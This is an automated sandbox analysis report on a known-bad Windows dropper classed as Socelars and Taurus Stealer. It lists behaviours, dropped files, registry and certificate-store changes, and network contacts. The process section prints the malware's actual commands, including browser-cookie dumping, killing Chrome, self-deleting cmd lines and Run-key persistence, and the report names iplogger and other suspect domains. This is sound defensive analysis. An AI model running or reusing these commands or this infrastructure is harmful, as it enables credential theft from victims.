Analysis Overview
SHA256
45768b491c097e5ca2f78860e8284de9d4347cbedb39b63b1d7cac4945c6004c
Threat Level: Known bad
The file 45768b491c097e5ca2f78860e8284de9d4347cbedb39b63b1d7cac4945c6004c was found to be: Known bad.
Malicious Activity Summary
Socelars Payload
Socelars
Taurus Stealer
Taurus Stealer Payload
Executes dropped EXE
UPX packed file
Reads user/profile data of web browsers
Loads dropped DLL
Checks computer location settings
Accesses 2FA software files, possible credential harvesting
Looks up external IP address via web service
Legitimate hosting services abused for malware hosting/C2
Adds Run key to start application
Checks installed software on the system
Enumerates physical storage devices
Suspicious use of FindShellTrayWindow
Suspicious use of WriteProcessMemory
Kills process with taskkill
Suspicious use of SetWindowsHookEx
Runs ping.exe
Delays execution with timeout.exe
Suspicious use of AdjustPrivilegeToken
Modifies system certificate store
Modifies Internet Explorer settings
Suspicious behavior: EnumeratesProcesses
MITRE ATT&CK
Enterprise Matrix V6
Analysis: static1
Detonation Overview
Reported
2022-02-06 13:12
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2022-02-06 13:12
Reported
2022-02-06 13:15
Platform
win7-en-20211208
Max time kernel
153s
Max time network
143s
Command Line
Signatures
Socelars
Socelars Payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Taurus Stealer
Taurus Stealer Payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RarSFX0\pub4.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RarSFX0\setup.upx.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RarSFX0\file.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RarSFX0\002.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RarSFX0\Setup.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-TCVUH.tmp\Setup.tmp | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RarSFX0\searzar\searzar.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RarSFX0\hjjgaa.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\jfiag_gg.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\jfiag_gg.exe | N/A |
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Loads dropped DLL
Reads user/profile data of web browsers
Accesses 2FA software files, possible credential harvesting
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\kissq = "C:\\Users\\Admin\\AppData\\Local\\Temp\\kissq.exe" | C:\Users\Admin\AppData\Local\Temp\RarSFX0\hjjgaa.exe | N/A |
Checks installed software on the system
Legitimate hosting services abused for malware hosting/C2
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ip-api.com | N/A | N/A |
Enumerates physical storage devices
Delays execution with timeout.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\Software\Microsoft\Internet Explorer\LowRegistry | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\Software\Microsoft\Internet Explorer\LowRegistry | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\Software\Microsoft\Internet Explorer\PageSetup | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\Software\Microsoft\Internet Explorer\GPU | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\Software\Microsoft\Internet Explorer\IntelliForms | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 701611bf631bd801 | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\Software\Microsoft\Internet Explorer\PageSetup | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\Software\Microsoft\Internet Explorer\Main | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\Software\Microsoft\Internet Explorer\Main | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\Software\Microsoft\Internet Explorer\IETld\LowMic | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\Software\Microsoft\Internet Explorer\InternetRegistry | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = [value omitted] | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\Software\Microsoft\Internet Explorer\Main | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\Software\Microsoft\Internet Explorer\Main | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "350921742" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{D9281271-8756-11EC-A514-46595837F587} = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000f302f7a020b975438ea1f1f995ba9783000000000200000000001066000000010000200000001a4e9f3712eb5de889121cd3fffd5cded3ca6f3942336b235f9f9a9bd2e6fca7000000000e80000000020000200000000cb3722f65383d4e8feddd84bc0edba9fe078e93b7b05d788aa08fda438a5cad20000000decaf1376415456119728aa1127d17990c580927efc25e5a2f9fe33c1ce3746540000000f264937b1c573bbcda57973a59d156421c2361a24fb562175be3d552a2e07c5fdd76f701c9edc622adced6f5bec400a287d6963be8d16d635b1652edbf88bc04 | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\en-US = "en-US.1" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\Software\Microsoft\Internet Explorer\IETld\LowMic | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\Software\Microsoft\Internet Explorer\Zoom | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\ | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\Software\Microsoft\Internet Explorer\DomainSuggestion | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\Software\Microsoft\Internet Explorer\Zoom | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\Software\Microsoft\Internet Explorer\GPU | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\Software\Microsoft\Internet Explorer\InternetRegistry | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\Software\Microsoft\Internet Explorer\Toolbar | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\Software\Microsoft\Internet Explorer\Toolbar | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{D925B111-8756-11EC-A514-46595837F587} = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\Software\Microsoft\Internet Explorer\IntelliForms | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = [value omitted] | C:\Users\Admin\AppData\Local\Temp\RarSFX0\file.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\Software\Microsoft\SystemCertificates\CA\Certificates\D89E3BD43D5D909B47A18977AA9D5CE36CEE184C | C:\Users\Admin\AppData\Local\Temp\RarSFX0\file.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\Software\Microsoft\SystemCertificates\CA\Certificates\D89E3BD43D5D909B47A18977AA9D5CE36CEE184C\Blob = [value omitted] | C:\Users\Admin\AppData\Local\Temp\RarSFX0\file.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 | C:\Users\Admin\AppData\Local\Temp\RarSFX0\file.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030853000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c00b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e | C:\Users\Admin\AppData\Local\Temp\RarSFX0\file.exe | N/A |
Runs ping.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\PING.EXE | N/A |
| N/A | N/A | C:\Windows\SysWOW64\PING.EXE | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-TCVUH.tmp\Setup.tmp | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-TCVUH.tmp\Setup.tmp | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\jfiag_gg.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| N/A | N/A | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-TCVUH.tmp\Setup.tmp | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| N/A | N/A | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| N/A | N/A | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| N/A | N/A | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| N/A | N/A | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| N/A | N/A | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| N/A | N/A | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| N/A | N/A | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| N/A | N/A | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RarSFX0\002.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RarSFX0\002.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\45768b491c097e5ca2f78860e8284de9d4347cbedb39b63b1d7cac4945c6004c.exe
"C:\Users\Admin\AppData\Local\Temp\45768b491c097e5ca2f78860e8284de9d4347cbedb39b63b1d7cac4945c6004c.exe"
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\DreamTrips.bat" "
C:\Program Files\Internet Explorer\iexplore.exe
"C:\Program Files\Internet Explorer\iexplore.exe" https://iplogger.org/1qzLu7
C:\Program Files\Internet Explorer\iexplore.exe
"C:\Program Files\Internet Explorer\iexplore.exe" https://iplogger.org/14Ahe7
C:\Users\Admin\AppData\Local\Temp\RarSFX0\pub4.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX0\pub4.exe"
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:604 CREDAT:275457 /prefetch:2
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1392 CREDAT:275457 /prefetch:2
C:\Windows\SysWOW64\cmd.exe
/c timeout /t 3 & del /f /q C:\Users\Admin\AppData\Local\Temp\RarSFX0\pub4.exe
C:\Users\Admin\AppData\Local\Temp\RarSFX0\setup.upx.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX0\setup.upx.exe"
C:\Windows\SysWOW64\timeout.exe
timeout /t 3
C:\Windows\SysWOW64\cmd.exe
cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\RarSFX0\setup.upx.exe"
C:\Users\Admin\AppData\Local\Temp\RarSFX0\file.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX0\file.exe"
C:\Windows\SysWOW64\PING.EXE
ping 1.1.1.1 -n 1 -w 3000
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX0\file.exe" >> NUL
C:\Users\Admin\AppData\Local\Temp\RarSFX0\002.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX0\002.exe"
C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1
C:\Users\Admin\AppData\Local\Temp\RarSFX0\Setup.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX0\Setup.exe"
C:\Users\Admin\AppData\Local\Temp\is-TCVUH.tmp\Setup.tmp
"C:\Users\Admin\AppData\Local\Temp\is-TCVUH.tmp\Setup.tmp" /SL5="$40284,680561,121344,C:\Users\Admin\AppData\Local\Temp\RarSFX0\Setup.exe"
C:\Users\Admin\AppData\Local\Temp\RarSFX0\searzar\searzar.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX0\searzar\searzar.exe"
C:\Users\Admin\AppData\Local\Temp\RarSFX0\hjjgaa.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX0\hjjgaa.exe"
C:\Users\Admin\AppData\Local\Temp\jfiag_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fjgha23_fa.txt
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c taskkill /f /im chrome.exe
C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im chrome.exe
C:\Users\Admin\AppData\Local\Temp\jfiag_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fjgha23_fa.txt
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | iplogger.org | udp |
| US | 8.8.8.8:53 | iplogger.org | udp |
| US | 8.8.8.8:53 | sfsdfpizdatrtu.space | udp |
| DE | 148.251.234.83:443 | iplogger.org | tcp |
| DE | 148.251.234.83:443 | iplogger.org | tcp |
| DE | 148.251.234.83:443 | iplogger.org | tcp |
| DE | 148.251.234.83:443 | iplogger.org | tcp |
| DE | 148.251.234.83:443 | iplogger.org | tcp |
| DE | 148.251.234.83:443 | iplogger.org | tcp |
| DE | 148.251.234.83:443 | iplogger.org | tcp |
| DE | 148.251.234.83:443 | iplogger.org | tcp |
| DE | 148.251.234.83:443 | iplogger.org | tcp |
| DE | 148.251.234.83:443 | iplogger.org | tcp |
| DE | 148.251.234.83:443 | iplogger.org | tcp |
| DE | 148.251.234.83:443 | iplogger.org | tcp |
| DE | 148.251.234.83:443 | iplogger.org | tcp |
| DE | 148.251.234.83:443 | iplogger.org | tcp |
| DE | 148.251.234.83:443 | iplogger.org | tcp |
| DE | 148.251.234.83:443 | iplogger.org | tcp |
| US | 8.8.8.8:53 | www.rationalowl.com | udp |
| KR | 211.239.150.87:443 | www.rationalowl.com | tcp |
| DE | 148.251.234.83:443 | iplogger.org | tcp |
| DE | 148.251.234.83:443 | iplogger.org | tcp |
| DE | 148.251.234.83:443 | iplogger.org | tcp |
| DE | 148.251.234.83:443 | iplogger.org | tcp |
| DE | 148.251.234.83:443 | iplogger.org | tcp |
| DE | 148.251.234.83:443 | iplogger.org | tcp |
| DE | 148.251.234.83:443 | iplogger.org | tcp |
| DE | 148.251.234.83:443 | iplogger.org | tcp |
| DE | 148.251.234.83:443 | iplogger.org | tcp |
| DE | 148.251.234.83:443 | iplogger.org | tcp |
| DE | 148.251.234.83:443 | iplogger.org | tcp |
| DE | 148.251.234.83:443 | iplogger.org | tcp |
| US | 8.8.8.8:53 | iplogger.org | udp |
| DE | 148.251.234.83:443 | iplogger.org | tcp |
| DE | 148.251.234.83:443 | iplogger.org | tcp |
| DE | 148.251.234.83:443 | iplogger.org | tcp |
| DE | 148.251.234.83:443 | iplogger.org | tcp |
| DE | 148.251.234.83:443 | iplogger.org | tcp |
| DE | 148.251.234.83:443 | iplogger.org | tcp |
| DE | 148.251.234.83:443 | iplogger.org | tcp |
| DE | 148.251.234.83:443 | iplogger.org | tcp |
| DE | 148.251.234.83:443 | iplogger.org | tcp |
| US | 8.8.8.8:53 | iplogger.org | udp |
| DE | 148.251.234.83:443 | iplogger.org | tcp |
| DE | 148.251.234.83:443 | iplogger.org | tcp |
| DE | 148.251.234.83:443 | iplogger.org | tcp |
| DE | 148.251.234.83:443 | iplogger.org | tcp |
| US | 8.8.8.8:53 | iplogger.org | udp |
| DE | 148.251.234.83:443 | iplogger.org | tcp |
| US | 8.8.8.8:53 | ffdownload.online | udp |
| US | 8.8.8.8:53 | www.ipcode.pw | udp |
| DE | 51.195.46.236:80 | www.ipcode.pw | tcp |
| US | 8.8.8.8:53 | iplogger.org | udp |
| DE | 148.251.234.83:443 | iplogger.org | tcp |
| DE | 148.251.234.83:443 | iplogger.org | tcp |
| DE | 148.251.234.83:443 | iplogger.org | tcp |
| DE | 148.251.234.83:443 | iplogger.org | tcp |
| DE | 148.251.234.83:443 | iplogger.org | tcp |
